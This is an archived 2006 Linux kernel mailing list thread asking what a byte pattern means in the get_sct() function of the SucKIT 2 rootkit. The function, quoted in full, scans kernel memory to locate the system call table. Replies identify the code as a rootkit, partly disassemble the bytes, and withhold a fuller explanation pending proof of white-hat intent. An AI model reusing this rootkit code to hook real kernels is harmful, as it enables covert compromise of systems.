What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
in [Kernel]
|
Prev: MAP OF THE PHILIPPINES
Next: Linux 2.6.16.6
From: openbsd shen on 5 Apr 2006 21:40 this code from get_sct() of suckit 2, why memmem() "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find? The get_sct() founction: ulong get_sct() { uchar code[SCLEN+256]; uchar *p, *pt; ulong r; uchar pt_off, pt_bit; int i; kernel_old80 = get_ep(); if (!kernel_old80) return 0; if (rkm(code, sizeof(code), kernel_old80-4) <= 0) return 0; if (!memcmp(code, "PUNK", 4)) return 0; p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3); if (!p) return 0; pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9); /* when run at here , it always return 0 */ if (!pt) { eprintf("pt = %s\n", pt); return 0; } sc.trace = *((ulong *) (pt + 9)); sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4; pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3); if (!pt) return 0; for (i = 0; i < (p-code); i++) { if ((code[i] == 0xf6) && (code[i+1] == 0x43) && (code[i+4] == 0x75) && (code[i+2] < 127)) { pt_off = code[i+2]; pt_bit = code[i+3]; goto cc; } } return 0; } - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo(a)vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/
From: David Schwartz on 6 Apr 2006 09:40 > In what file did you find this? This is how back-doors are written! > > On Wed, 5 Apr 2006, openbsd shen wrote: > > > this code from get_sct() of suckit 2, why memmem() > > "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find? > > The get_sct() founction: As he said, it's from "suckit 2", a root kit. Back-doors in a root kit? Whodathunkit. ;) DS - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo(a)vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/
From: Jan Engelhardt on 8 Apr 2006 05:10 >Subject: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" Does not look like x86 asm code: > p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3); call dword ptr [edx-...] > pt = (char *) memmem(p+7, SCLEN-(p-code)-7, > "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9); mov dword ptr [esp+0x18], 0xffffffda Nope, does not look meaningful if taken as x86 asm. Jan Engelhardt -- - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo(a)vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/
From: Dan Sheppard on 10 Apr 2006 16:20 I can explain this, but I'll need a bit more convincing about your whitehated-ness. I've been dabbling for a while with custom-kitting a honeypot machine with a kit which sits under suckit2 and event-logs it, to see what da kidz get up to on sukit'ed machines. Just curiosity, really, having come up against suckit a fair few times. Dan. - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo(a)vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/
|
Pages: 1 Prev: MAP OF THE PHILIPPINES Next: Linux 2.6.16.6 |